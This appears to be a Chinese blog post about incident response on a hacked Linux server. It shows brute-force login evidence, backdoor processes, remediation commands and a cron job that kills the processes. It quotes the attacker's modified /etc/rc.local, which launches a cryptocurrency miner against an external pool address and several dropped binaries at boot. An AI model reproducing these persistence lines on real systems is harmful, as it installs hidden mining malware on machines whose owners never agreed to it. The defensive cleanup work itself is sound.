攻击类型:
主要是后门和肉鸡行为
先解决后门的问题:
步骤
(1)搞清楚后门文件的来历(是如何产生的)
(2)删除后门文件
具体做法:
使用定时器 定期删除后门文件
待删除的文件列表:
(a)/usr/bin/acpid
(b)/usr/bin/bsd-port/agent
定时器要执行的脚本:
定时器:
如何解决肉鸡行为呢?
查看/var/log/secure ,看到确实被多次尝试登陆
- [root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq
- apache from 121.42.0.30
- ftp from 121.42.0.30
- invalid user admin
- invalid user test
- invalid user user
- mail from 121.42.0.30
- root from 121.42.0.30
发现可疑进程:
如何提高安全性?
我觉得应该有一个机制:
当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信
查看root的home目录下的.bash_history
终于发现了猫腻:
同时还修改我系统核心文件/etc/rc.local
于是查看/etc/rc.local 的修改记录:
[root@iZ25tti3rxdZ ~]# stat /etc/rc.local
File: `/etc/rc.local'
Size: 390 Blocks: 8 IO Block: 4096 regular file
Device: ca01h/51713dInode: 787612 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2016-01-10 16:34:59.807094407 +0800
Modify: 2015-12-07 11:23:07.160211728 +0800
Change: 2015-12-07 11:23:07.160211728 +0800
说明在2015-12-07 11:23:07被人恶意修改过
再看看修改成啥样了:
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
/tmp/minerd -a scrypt -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk
/mnt/linsx
/mnt/linsx
/mnt/linsx
/mnt/linsx
/tmp/linex
/tmp/linex
/tmp/2897
/tmp/2897
~
正常的:
解决方法:
sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local
异常进程:
[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep
root 16790 1 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16804 16790 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16805 16804 0 16:48 ? 00:00:00 /usr/bin/acpid
如何杀*死异常进程:
- ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" " {'print $2'}|xargs -i kill -9 {}
- ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" " {'print $2'}|xargs -i kill -9 {}
上述代码是在定时器中执行的,每10分钟执行一次
